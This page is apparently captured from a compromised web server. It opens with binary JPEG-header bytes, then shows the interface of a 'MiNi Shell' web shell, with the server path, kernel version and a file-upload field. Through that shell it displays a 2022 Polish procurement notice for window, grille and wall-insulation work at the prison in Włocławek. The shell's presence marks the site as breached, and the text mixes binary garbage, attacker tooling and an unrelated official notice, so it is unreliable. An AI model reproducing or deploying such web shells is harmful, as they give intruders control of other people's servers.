JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220531/0018765601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wymiana stolarki okiennej wraz z wymianą krat i dociepleniem ścian pawilonu mieszkalnego E w Zakładzie Karnym we Włocławku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Karny we Włocławku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000319687</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bartnicka 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Włocławek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-809</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk_wloclawek@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wymiana stolarki okiennej wraz z wymianą krat i dociepleniem ścian pawilonu mieszkalnego E w Zakładzie Karnym we Włocławku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a060e926-e0e9-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00187656</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00056854/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Wymiana stolarki okiennej wraz z wymianą krat i dociepleniem ścian pawilonu mieszkalnego E w Zakładzie Karnym we Włocławku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> htts://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://epuap.gov.pl/wps/portal, opcjonalnie poczta elektroniczna -<br/>zk_wloclawek@sw.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w<br/>języku polskim.<br/>2. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się drogą elektroniczną<br/>przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>formularza do komunikacji.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przy ich użyciu, opisane zostały w<br/>Regulaminie korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUsługi.aspx oraz Regulaminie<br/>ePUAP.<br/>5. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego<br/>regulaminu.<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do<br/>komunikacji wynosi 150MB.<br/>7. Identyfikator postępowania i klucz publiczny dla postępowania o udzielenie zamówienia dostępne są na Liście wszystkich<br/>postępowań w systemie miniPortal.<br/>8. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, podmiotowych środków dowodowych,<br/>przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazanych w postępowaniu,<br/>przyjmuje się datę ich przekazania na ePUAP.<br/>9. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna ( inna niż oferta Wykonawcy i załączniki do oferty)<br/>odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez<br/>miniPortal (Formularz do komunikacji). Korespondencja przesyłana za pomocą tego formularza nie może być szyfrowana. We<br/>wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawca posługują się numerem ogłoszenia<br/>(BZP).<br/>10. Zamawiający dopuszcza również możliwość komunikacji z Wykonawcami za pomocą poczty elektronicznej z wyjątkiem złożenia,<br/>zmiany lub wycofania oferty - email: zk_wloclawek@sw.gov.pl Wszelkie składane w ten sposób dokumenty muszą być opatrzone<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, w ogólnie dostępnych formatach danych, w<br/>szczególności w formatach: . rtf, doc, docx, odt, pdf.<br/>11. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem Formularza do komunikacji mają być opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń musi być zgody z wymaganiami określonym w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 poz. 2452).<br/>12. Zalecenia Zamawiającego dotyczące stosowania podpisu elektronicznego:<br/>a) dla dokumentów w formacie .pdf zaleca się stosowanie podpisu w formacie PadES,<br/>b) dla dokumentów w formacie innym niż .pdf zaleca się zastosowanie podpisu wewnętrznego w formacie XAdES. Wykonawca<br/>zobowiązany jest załączyć plik z dokumentem oraz plik z podpisem, o ile plik z dokumentem nie zawiera formatu podpisu<br/>elektronicznego.<br/>13. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektyw 95/46/WE (Dz. Urz. UE L 119 z 04.05.2016 str. 1), dalej „RODO”<br/>informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Zakład Karny we Włocławku z siedzibą przy ul. Bartnickiej 10, 87-809<br/>Włocławek, tel. 54 235 50 55 reprezentowany przez Dyrektora Zakładu Karnego we Włocławku.<br/>2. Współadministratorem Pani/Pana danych osobowych jest:<br/>2.a. Urząd Zamówień Publicznych, ul. Postępu 17a, 02 – 676 Warszawa, reprezentowany przez Prezesa UZP – względem osób<br/>fizycznych, od których dane osobowe pozyskał w toku kontroli,<br/>b. Krajowa Izba Odwoławcza, ul. Postępu 17 a, 02 – 676 Warszawa ,reprezentowana przez Prezesa KIO -m względem osób<br/>fizycznych od których dane osobowe pozyskał w ramach wniesionych środków ochrony prawnej;<br/>3. Inspektorem ochrony danych IOD w Zakładzie Karnych we Włocławku jest Pani kpt. Edyta Nowicka, ul. Bartnicka 10, 87-809<br/>Włocławek, e-mail: iod_zk_wloclawek@sw.gov.pl, tel. 54 235 0 369.Pani/Pana dane osobowe przetwarzane będą na podstawie art.<br/>6 ust 1 lit.c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego: Na wykonanie - w trybie „zaprojektuj i<br/>wybuduj” robót budowlanych polegających na budowie pawilonu mieszkalnego w Zakładzie Karnym we Włocławku ” Nr ref. sprawy:<br/>DKw.2232.1.2020 w kategorii dane zwykłe, dane wrażliwe, o których mowa w art. 9 i lub 10 RODO<br/>4. Do przetwarzania danych osobowych w kategorii dane wrażliwe dotyczące wyroków skazujących, o których mowa w art. 10<br/>RODO, dopuszczone są wyłącznie osoby posiadające pisemne upoważnienie administratora danych. Osoby takie są ponadto<br/>zobowiązane do zachowania tych danych w poufności;<br/>5. W odniesieniu do danych osobowych w kategorii dane wrażliwe dotyczące wyroków skazujących, o których mowa w art. 10<br/>RODO, Zamawiający będzie udostępniał te dane jedynie w sytuacji, w której ujawnienie jest niezbędne w celu umożliwienia<br/>korzystania ze środków ochrony prawnej. Po upływie terminu na skorzystanie ze środków ochrony prawnej albo w przypadku gdy o<br/>dostęp do dokumentów zawierających te dane ubiegają się podmioty, którym nie przysługuje prawo do korzystania ze środków<br/>ochrony prawnej Zamawiający będzie udostępniał dane osobowe zawarte w ww. dokumentach po ich odpowiednim<br/>spseudonimizowaniu;<br/>6. Protokół postępowania wraz z załącznikami jest jawny, z wyłączeniem danych, o których mowa w art. 9 ust 1 RODO, zebranych w<br/>toku postępowania o udzielenie zamówienia publicznego;<br/>7. Pani/Pana dane osobowe będą przetwarzane, zgodnie z art. 97 ust 1 ustawy Pzp, przez okres 4 lat do dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy( chyba ze niezbędny będzie dłuższy okres przetwarzania : dochodzenie roszczeń lub inny obowiązek wymagany<br/>przez przepisy prawa powszechnie obowiązującego;<br/>8. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynika z ustawy Pzp;<br/>9. - w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/>22 RODO;<br/>10. - Pani/Pana dane osobowe będą /nie będą przekazywane do państwa trzeciego lub organizacji międzynarodowej;<br/>11. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2018 r. poz. 1986),<br/>dalej „ustawa Pzp”;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">12. Posiada Pani/Pan :<br/>1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>12.a. Jeżeli podanie informacji o Pani/Pana danych wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać<br/>wskazania dodatkowych informacji mających na celu sprecyzowanie Pani/Pana żądania, w szczególności podania nazwy lub daty<br/>postępowania o udzielenie zamówienia publicznego;<br/>12.b. W przypadku Pani/Pana danych osobowych zamieszczonych przez Zamawiającego w biuletynie Zamówień Publicznych prawo<br/>do Pani/Pana danych jest wykonywane w drodze żądania skierowanego do Zamawiającego, przy czym za wdrożenie wszelkich<br/>proporcjonalnych środków organizacyjnych i technicznych, aby przetwarzanie Pani/Pana danych osobowych w BZP odbywało się<br/>zgodnie z przepisami o ochronie danych osobowych, odpowiedzialny jest Prezes UZP;<br/>2) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>12.a. Realizacja tego prawa nie może prowadzić do zmiany wyniku postępowania o udzielenie zamówienia publicznego. Zmiany<br/>postanowień umowy ani nie może naruszyć integralności protokołu i załączników do niego.<br/>12.b. W przypadku Pani/Pana danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych prawo<br/>dostępu do Pani/Pana danych jest wykonywane w drodze żądania skierowanego do Zamawiającego, przy czym za wdrożenie<br/>wszelkich proporcjonalnych środków organizacyjnych i technicznych, aby przetwarzanie Pani/Pana danych osobowych w BZP<br/>odbywało się zgodnie z przepisami o ochronie danych osobowych, odpowiedzialny jest Prezes UZP.<br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia danych osobowych z zastrzeżeniem przypadków, o<br/>których mowa w art. 18 ust 2 RODO;<br/>12.a. prawo do wniesienia skargi do prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy dotyczący ochronę danych osobowych.<br/>13. Nie przysługuje Pani/Panu:<br/>1) w związku z art. 17 ust 3 lit. B,d lub e RODO – prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO;<br/>3) prawo sprzeciwu wobec przetwarzania danych osobowych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D.Kw.2232.4.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 669977,14 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na wymianie stolarki okiennej wraz z wymianą<br/>krat, przesłon okiennych, siatek drobnooczkowych oraz dociepleniu ścian pawilonu mieszkalnego E w Zakładzie Karnym<br/>we Włocławku. Lokalizacja planowanego remontu - ul. Bartnicka 10, 87-800 Włocławek na terenie działki o nr ewidencyjnym<br/>1/141, obręb Michelin KM 14, jednostka ewidencyjna Miasto Włocławek.<br/>2. Zakres robót obejmuje w szczególności :<br/>- wymianę stolarki okiennej wraz z parapetami zewnętrznymi oraz wymianę krat,przesłon okiennych i siatek<br/>drobnooczkowych;<br/>- wymianę rur spustowych;<br/>- wymianę stolarki drzwiowej zewnętrznej;<br/>- wymianę istniejących na budynku zabezpieczeń techniczno-ochronnych zgodnie z warunkami technicznymi wynikającymi z<br/>zakresu prowadzonych prac;<br/>- wykonanie ocieplenia ścian zewnętrznych budynku styropianem o grubości 20 cm;<br/>- wykonanie nowej warstwy tynku na ścianach zewnętrznych budynku;<br/>- malowanie ścian farbą elewacyjną;<br/>- inne roboty towarzyszące.<br/>W ramach przedmiotu zamówienia należy zapewnić demontaż oraz ponowny montaż elementów systemów monitoringu i<br/>zabezpieczeń elektronicznych w porozumieniu z działem techniki, łączności i informatyki Zakładu Karnego we Włocławku.<br/>Niedopuszczalne jest tworzenie dodatkowych połączeń w okablowaniu. Jeśli przewody po uwzględnieniu nowej grubości<br/>izolacji termicznej okażą się zbyt krótkie, należy wymienić całość okablowania urządzenia.<br/>Prace remontowe będą prowadzone wewnątrz i na zewnątrz obiektu bez jego wyłączenia z eksploatacji. Z uwagi na to, iż<br/>roboty budowlane będą prowadzone w czynnym obiekcie - budynku zakwaterowania osadzonych Wykonawca zobowiązany<br/>będzie zorganizować je tak, aby nie narażać użytkowników obiektu i osób trzecich na niebezpieczeństwa i uciążliwości<br/>wynikające z prowadzonych robót oraz zobowiązany będzie współpracować z Zamawiającym w trakcie realizacji robót<br/>budowlanych (szczegółowe informacje w powyższym zakresie określa notatka służbowa działu ochrony z dn. 30.03.2022 r. –<br/>załącznik nr 6 do SWZ.<br/>3. Szczegółowy opis przedmiotu zamówienia został zawarty w dokumentacji projektowej obejmującej przedmiar robót -<br/>załącznik nr 4 do SWZ oraz w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych (STWiORB) - załącznik nr<br/>5 do SWZ.<br/>4. Przedmiot zamówienia należy wykonać zgodnie z obowiązującymi przepisami prawa oraz obowiązującymi normami z<br/>należytą starannością oraz zasadami sztuki budowlanej.<br/>5. Zamawiający zaleca przed złożeniem oferty odbycie przez Wykonawcę wizji lokalnej miejsca robót budowlanych i<br/>sprawdzenia dokumentów niezbędnych do realizacji zamówienia w siedzibie Zamawiającego. Zamawiający przewiduje<br/>wyznaczenie jednego dnia na umożliwienie wykonawcom przeprowadzenia wizji lokalnej tj. 08.05.2022 r. godz.11.00.<br/>Warunkiem dokonania oględzin jest uprzednie złożenie do Dyrektora Zakładu Karnego we Włocławku pisemnego wniosku o<br/>wstęp na teren jednostki penitencjarnej w celu przeprowadzenia wizji lokalnej – zgodnie z załącznikiem nr 7 do SWZ.<br/>6. Jeżeli w jakimkolwiek miejscu SWZ oraz w załącznikach do niniejszego postępowania tj. w dokumentacji projektowej<br/>wykonawczej wskazano konkretnych producentów, nazwy własne, znaki towarowe, patenty lub pochodzenie materiałów czy<br/>urządzeń służących do wykonania niniejszego zamówienia – celem rzetelnego opracowania projektu, umożliwiając jego<br/>jednoznaczne odczytanie, wszędzie tam Zamawiający dodaje wyrazy „lub równoważne”.<br/>7. Zamawiający informuje, że określając przedmiot zamówienia poprzez wskazanie nazw handlowych, dopuszcza<br/>jednocześnie wszelkie inne odpowiedniki rynkowe nie gorsze niż wskazane. Parametry wskazanego przez Zamawiającego<br/>standardu przedstawiają warunki techniczne, eksploatacyjne, użytkowe, funkcjonalne oraz inne cechy istotne dla<br/>przedmiotu zamówienia. Natomiast wskazana marka lub nazwa handlowa określa klasę produktu, a nie konkretnego<br/>producenta. Zamawiający dopuszcza możliwość stosowania materiałów równoważnych w stosunku do opisanych i<br/>podanych w wymaganych parametrach w SWZ pod warunkiem, że będą posiadały nie gorsze parametry techniczne.<br/>8. Wszystkie materiały użyte do wykonania przedmiotu zamówienia stosowane przez Wykonawcę muszą być fabrycznie<br/>nowe, posiadać stosowne, wymagane przepisami prawa atesty, aprobaty techniczne, spełniać wymagane przepisami normy<br/>oraz posiadać wymagane dopuszczenia do obrotu gospodarczego.<br/>9. W związku z ustawą z dnia 9 listopada 2018 r. o elektronicznym fakturowaniu w zamówieniach publicznych, koncesjach<br/>na roboty budowlane lub usługi oraz partnerstwie publiczno-prywatnym, Zakład Karny we Włocławku akceptuje faktury<br/>elektroniczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">140 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Oferowany okres gwarancji jakości oraz rękojmi za wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. 